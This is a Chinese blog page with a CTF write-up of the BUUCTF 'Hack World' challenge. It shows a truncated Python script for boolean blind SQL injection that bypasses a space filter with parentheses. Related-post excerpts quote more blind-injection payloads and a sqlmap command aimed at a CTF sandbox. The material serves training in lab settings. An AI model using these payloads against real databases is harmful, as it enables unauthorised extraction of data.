BUUCTF之[CISCN2019 华北赛区 Day2 Web1]Hack World ------- Boolean盲注

最新推荐文章于 2023-12-09 16:59:30 发布
最新推荐文章于 2023-12-09 16:59:30 发布
阅读量388 收藏
点赞数
分类专栏: 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/120619647
版权

Python SQL盲注 布尔盲注 HTTP状态码 代码修复
关键词由CSDN通过智能技术生成

在这里插入图片描述
第一眼看这题的时候还以为是堆叠查询,结果试了下发现并不是。然后试着试着发现这题其实是个bool盲注题。然后再写个Python脚本暴力破解就可以了(其实解题思路并不是自己想出来的,只是这题之前做过很多次了。所以现在再做的时候有印象)

这题没什么难的,主要知识点就是bool盲注。还有就是空格需要用括号()来绕过
先说一下网上找来的别的大佬的Payload

# -*- coding:utf-8 -*-
import requests
import string

def blind_injection(url):
	flag = ''
	strings = string.printable
	for num in range(1,60):
		for i in strings:
			payload = '(select(ascii(mid(flag,{0},1))={1})from(flag))'.
最低0.47元/天 解锁文章
若丶时光破灭
关注
专栏目录
全网最全-谷粒商城项目-面试总结-简历优化
成功最快的秘诀: 抱团取暖 。
09-20 28万+
该系用采用SpringCloud架构,利用SpringBoot构建应用,利用Nacos作为服务的注册、配置中心,利用OpenFeign实现与其他模块进行交互,利用Sentinel实现熔断降级和错误处理,利用Gateway作为服务网关,利用RabbitMQ实现延迟队列,利用Redis作为缓存解决读多写少的场景,利用MySQL进行持久化,利用MyBatisPlus作为持久化框架。
Spring Boot入门(13):Mybatis-Plus之条件构造器使用手册:精通让你快速提高查询效率的技巧!
**My Coding Family**
08-18 3万+
化繁为简,MP 中条件构造器的使用,极其详细.
[buuctf][CISCN2019 华北赛区 Day2 Web1]Hack World
qq_37301470的博客
11-28 1094
[CISCN2019 华北赛区 Day2 Web1]Hack World 分析 打开环境发现这个 All You Want Is In Table 'flag' and the column is 'flag' 还有个输入框 随便输一个数字1 返回 Hello, glzjin wants a girlfriend. 肯定是sql注入没跑了,而且要查找flag表下的flag字段 由于提交前后url没有变化,所以是通过POST方法提交了参数id。 打开hackbar模拟post过程 发现输入3 or 1=1
BUUCTF——Hack World
weixin_45864041的博客
12-03 1304
题目告诉我们表名为flag,列名为flag 所以值查询为select flag from flag 按照提示传入id=0 传入id=1 什么都不传 现在看来应该是布尔型盲注,而且过滤了一些东西 尝试传入1^1 传入1^0 直接构造payload 1^(ascii(substr((select flag from flag),0,1))=102) 传入后可以发现,空格被过滤了 所以换一下 1^(ascii(substr((select(flag)from(flag)),0,1))=102) .
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World
qq_60829702的博客
10-22 680
使用二分法就是快呀,大家可以运行这两个脚本比较一下,我刚开始是用第二个的,后面用了第一个。这两个就不是一个级别的,这里我编写二分法脚本的时候也出现了一点问题,然后看其他师傅的文章借鉴了一下。看到这里确实是可以的,但是当我们输入id=0的时候也会显示这个错误,所以我们就不需要使用异或了,直接就是布尔盲注就行了。按照正常的思路,就是找到注入点后就看能不能使其闭合了,但没办法过滤了太多了,我们使用bp看一下过滤了哪些东西。我这里有两个脚本一个二分法的,一个就是直接暴力比较的脚本,有需要可以自取。
buuctfhack world wp
m0_55185160的博客
08-16 333
打开网页我们可以得到表名和列名都为flag 在输入框内输入1得到 输入2得到 输入3时 发现报错于是尝试注入 1 union select 1,2 发现受限制我们进行一个fuzz测试 长度为460的都是被过滤的 看了大佬的方法发现这里运用sql三目运算 if(表达式1,表达式2,表达式3)如果表达式1正确,执行表达式2,否则执行表达式3 if(ascil(substr((select(flag)from(flag)),%d,1))>%d,1,2)''%(x,mid) 用大佬的...
buuctf [CISCN2019] hackworld
SopRomeo的博客
02-07 1767
过滤了很多sql字符,最终发现可以盲注,跟极客大挑战的fianlsql注入一样,这边告诉你表名和列名了 直接输入语句 1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1 盲注手去敲太费时间,结合finalsql的经验,写脚本,注意这是post请求 奉上卑微脚本(看到大哥写的脚本太狠了) import requests import ti...
buuctf-Hack World
m0_62094846的博客
02-21 514
很多都被过滤了,空格也是,回显信息只有1和2有,报错的信息也是一样的,用盲注试试。用if的盲注是可行的。
java基础教程----精华版
09-22
- **变量**:在Java中,变量是存储数据的容器,分为基本类型(如int, double, boolean等)和引用类型(如类、接口、数组)。 - **数据类型**:Java有两大类数据类型,即原始类型(primitives)和引用类型...
mybatis 中 if-test 判断详解
热门推荐
Gorden的博客
05-07 7万+
<if test="takeWay == '0'">】mybatis的if判断 单个的字符要写到双引号里面才行,改为<if test='takeWay == "1"'>或者改为<if test="takeWay == '1'.toString() "> .xml文件的部分代码 <insert id="insertDelivery" parameterType="com.zuci.request.DeliveryPreferenceReq"> ...
[CISCN2019 华北赛区 Day2 Web1]Hack World
PromisingQ
10-06 459
目录刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World一、前言二、正文1、解题过程2、解题方法 1|0刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World 1|1一、前言 离国赛已经过去好久了,到现在才看复现,这道题当时做的时候没有什么头绪,现在来看答案发现其实没有很难,就是经验还不足 1|2二、正文 题目复现链接:https://buuoj.cn/challenges 参考链接:ciscn2019华北赛区半决赛day2_web1题解 ...
BUUCTF WEB Hack World1
qq_41696858的博客
10-19 2033
经典脚本爆破 打开场景,发现一个输入框,提示要输入数字,鉴于题目上有明确提示,sql注入 那么我们先试试,输入纯数字 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do you want to be my girlfriend? 输入大于2的数回显:Error Occured When Fetch Result. 目测是由数字判断回显类型,且有不同回显,就怕不回显呢,那么考虑bool盲注
buuctf_[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_43952190的博客
07-02 835
Hack World 进入后提示是sql注入,并且给了表和列名。 进行fuzz测试,过滤了很多字符。 主要的union字符被过滤,但select,from没有被过滤。 我们还发现id只有输入1,2时分别返回Hello, glzjin wants a girlfriend.,Do you want to be my girlfriend?。并且支持异或判断。 所以可以进行布尔盲注读取数据。 id=0^(ascii(substr((select(flag)from(flag)),1,1))&gt
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_74911687的博客
03-03 610
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
web buuctf [CISCN2019 华北赛区 Day2 Web1]Hack World1
weixin_44214568的博客
03-20 1878
考点:盲注(布尔注入);异或的使用 1.输入1' 提示的是bool(错误),这里没有报错回显,只提示错误,其实就可以判断出是个布尔注入 2. 输入1' or '1=1'# 存在过滤,用bp抓包,fuzz进行爆破,看过滤了什么字符; (看回显,长度为482的都会提示sql注入,即被过滤的字符)这只能确定一部分,在实际操作中因为字符链接,字符本身都会产生新的过滤,注意一下 or的连接语句,空格等 3.根据提示 即从表flag的flag列内提取内容,根据前面的操作可知存在布尔注入,我
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注
最新发布
m0_73734159的博客
12-09 1094
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注入是否成功。布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。可知是字符型的布尔注入(盲注
[CISCN2019 华北赛区 Day2 Web1]Hack World --BUUCTF
金 帛的博客
06-12 845
BUUUCTF记录贴
CTFHUB-SQL注入-布尔盲注
u014794539的博客
07-10 635
考点布尔盲注 分析过程 想练习一下sqlmap工具的使用 于是 构造 playload: python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 --dbs 找到库名sqli 然后爆表 找到flag python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 -D sqli --t
STM8S单片机移植μC/OS-II实战指南
1. **定义OS数据类型**:根据STM8S的内存模型,定义μC/OS-II所需的数据类型,如OS_STK(任务堆栈指针)、BOOLEAN、INT8U/S等,确保数据类型与硬件兼容。 2. **配置中断服务程序**:μC/OS-II依赖中断服务程序来...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值